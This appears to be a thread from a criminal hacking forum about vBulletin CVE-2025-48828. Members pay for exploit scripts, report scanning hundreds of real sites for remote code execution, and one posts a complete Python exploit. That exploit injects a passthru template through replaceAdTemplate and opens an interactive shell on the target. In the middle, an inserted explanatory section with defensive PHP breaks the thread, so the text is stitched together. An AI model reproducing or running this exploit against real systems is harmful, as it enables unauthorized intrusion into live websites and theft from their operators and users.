
vBulletin - CVE-2025-48828

cr4ka
CD disk
User
Joined: 06.05.2024
Messages: 14
Reactions: 6
Escrow deals: 4
Hi all, an interesting thing has appeared.
Looking for someone who wants to help write a checker;
payment for speed will be reasonable, we'll agree on it)
CVE-2025-48828
WriteUp


I already sent him the script on Wednesday. Got a thank-you in the form of "Thx!". So this can be closed 😁
 
Please note that this user is banned
> payment for speed will be reasonable, we'll agree on it)
> I already sent him the script on Wednesday. Got a thank-you in the form of "Thx!". So this can be closed 😁
Dear mods, is it just me, or should people be banned for this?
 
Been trying to find any vulnerable vBulletin site to test this out, but this has very specific requirements, such as the site having to run a PHP version of 8.1 and above; that alone limits a lot of targets to find. Has anyone had any luck finding real targets with this vulnerability?
 
> Been trying to find any vulnerable vBulletin site to test this out, but this has very specific requirements, such as the site having to run a PHP version of 8.1 and above; that alone limits a lot of targets to find. Has anyone had any luck finding real targets with this vulnerability?
This issue arises from the misuse of the PHP Reflection API in the vBulletin API controller logic, combined with specific changes introduced in PHP 8.1 that allow protected (and even private) methods to be invoked, for example, via the ReflectionMethod::invoke() method.

You can visit this link for further reading:
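The PHP 8.1 behaviour the reply above describes, shown as an added example (this is not vBulletin's code and not from the write-up; DemoController, dispatchUnsafe, dispatchSafe and the allowlist are hypothetical names chosen for the illustration). Since PHP 8.1, ReflectionMethod::setAccessible() has no effect and every method is invokable, so a dispatcher that maps a request string straight to a method name can no longer rely on Reflection to reject non-public methods; it has to check visibility and an explicit allowlist itself:

```php
<?php
// Added illustration, not vBulletin's code: a Reflection-based API
// dispatcher must enforce method visibility itself on PHP >= 8.1.

class DemoController
{
    public function fetch(): string
    {
        return 'public: fetch';
    }

    // Internal helper, never meant to be reachable from a request.
    protected function internalHelper(): string
    {
        return 'protected: internalHelper';
    }
}

// Unsafe dispatch: assumes Reflection will refuse non-public methods.
// Before PHP 8.1, invoke() on a protected/private method threw a
// ReflectionException unless setAccessible(true) was called first;
// since PHP 8.1 all methods are invokable, so this reaches the helper.
function dispatchUnsafe(object $controller, string $method): string
{
    $ref = new ReflectionMethod($controller, $method);
    return $ref->invoke($controller);
}

// Hardened dispatch: the request may only select methods that are
// (a) on an explicit allowlist and (b) public, non-static instance methods.
function dispatchSafe(object $controller, string $method, array $allowlist): string
{
    if (!in_array($method, $allowlist, true)) {
        throw new RuntimeException("method not exposed: $method");
    }
    $ref = new ReflectionMethod($controller, $method);
    if (!$ref->isPublic() || $ref->isStatic() || str_starts_with($method, '_')) {
        throw new RuntimeException("method not callable via API: $method");
    }
    return $ref->invoke($controller);
}

$c = new DemoController();

// Runs on PHP >= 8.1 even though the method is protected.
echo dispatchUnsafe($c, 'internalHelper'), PHP_EOL;

// Same request against the hardened dispatcher is rejected.
try {
    echo dispatchSafe($c, 'internalHelper', ['fetch']), PHP_EOL;
} catch (RuntimeException $e) {
    echo 'blocked: ', $e->getMessage(), PHP_EOL;
}

// Allowlisted public method still works.
echo dispatchSafe($c, 'fetch', ['fetch']), PHP_EOL;
```

The allowlist check is the important half: visibility alone is not a security boundary once every method can be invoked, so the set of request-reachable methods should be declared explicitly rather than derived from whatever a controller class happens to contain.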
 
> This issue arises from the misuse of the PHP Reflection API in the vBulletin API controller logic, combined with specific changes introduced in PHP 8.1 that allow protected (and even private) methods to be invoked, for example, via the ReflectionMethod::invoke() method.
>
> You can visit this link for further reading:
Yeah, I read the write-up for the vulnerability. I was just saying that even though vBulletin is widely used, the specific requirements for this particular vulnerability to allow RCE are rare to find; I mean, so far I have tested against at least 200-something sites, and none of them got me RCE so far. I found the vBulletin versions that were identified, but the PHP version was not up to date; where PHP was identified as 8.1 and above, the vBulletin version did not match. Maybe someone else has had better luck trying to exploit this.
 
> Yeah, I read the write-up for the vulnerability. I was just saying that even though vBulletin is widely used, the specific requirements for this particular vulnerability to allow RCE are rare to find; I mean, so far I have tested against at least 200-something sites, and none of them got me RCE so far. I found the vBulletin versions that were identified, but the PHP version was not up to date; where PHP was identified as 8.1 and above, the vBulletin version did not match. Maybe someone else has had better luck trying to exploit this.
For clarity, I was using the PHP script given in the write-up; I have not tested the msf module or the Python script you shared. Will test and see if they get me any results.
 
> Yeah, I read the write-up for the vulnerability. I was just saying that even though vBulletin is widely used, the specific requirements for this particular vulnerability to allow RCE are rare to find; I mean, so far I have tested against at least 200-something sites, and none of them got me RCE so far. I found the vBulletin versions that were identified, but the PHP version was not up to date; where PHP was identified as 8.1 and above, the vBulletin version did not match. Maybe someone else has had better luck trying to exploit this.
Same for me, I ran about 100 or so and have not been able to get RCE on a single one. I see lots online about 100k+ vulnerable, but I do not think this is the case at all; I'd say less than 5% will be vulnerable.
 
Maybe it'll be useful to someone.

Without the correct styleid the template simply won't be applied, and the RCE won't work.
This script determines the required styleid itself and launches a shell.

Python:
import sys
import requests
import urllib3
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

print("\n+---------------------------------------------------------------------+")
print("| vBulletin (replaceAdTemplate) RCE Exploit – Targeted Attack        |")
print("+---------------------------------------------------------------------+\n")

if len(sys.argv) != 2:
    print("Usage: python3 rce.py https://target.site/")
    sys.exit(1)

target = sys.argv[1].rstrip("/")
main_url = target
template_url = main_url + "/ajax/api/ad/replaceAdTemplate"
render_url = main_url + "/ajax/render/ad_rce"

sess = requests.Session()
sess.verify = False
sess.headers.update({"User-Agent": "Mozilla/5.0"})

def get_styleid():
    # Look for a styleid in the forum page; fall back to "1" if none is found
    try:
        r = sess.get(main_url + "/forum", timeout=10)
        match = re.search(r'styleid=(\d+)', r.text, re.IGNORECASE)
        return match.group(1) if match else "1"
    except requests.RequestException:
        return "1"

styleid = get_styleid()
print(f"[+] Using styleid: {styleid}")

payload = {
    "routestring": "ajax/api/ad/replaceAdTemplate",
    "styleid": styleid,
    "location": "rce",
    "template": '<vb:if condition=\'"passthru"($_POST["cmd"])\'></vb:if>'
}

resp = sess.post(template_url, data=payload)
if resp.text.strip() != "null":
    print("[-] Failed to inject template.")
    sys.exit(1)

print("[+] Template successfully injected. Entering shell (type 'exit' to quit).\n")

while True:
    try:
        cmd = input("vBulletin-shell# ").strip()
        if cmd == "exit":
            break

        data = {
            "routestring": "ajax/render/ad_rce",
            "cmd": cmd
        }

        r = sess.post(render_url, data=data)
        match = re.search(r'(.*?)\{"template":', r.text, re.DOTALL)
        if match:
            print(match.group(1).strip())
        else:
            print(r.text.strip())
    except KeyboardInterrupt:
        break
 
Ahaha, fucking mouse

> Dear mods, is it just me, or should people be banned for this?

Vinki Ziger14

Holy shit, you can't even take a crap before they're trying to ban you
I sent the bro something for the help, no need to get nervous.
Said it, did it)
Proof
 
> Vinki Ziger14
>
> Holy shit, you can't even take a crap before they're trying to ban you
> I sent the bro something for the help, no need to get nervous.
> Said it, did it)
> Proof
and exposed the bro's BTC wallet for everyone to see)
 
> and exposed the bro's BTC wallet for everyone to see)
well, it's in my signature

Funds received, no complaints.
 

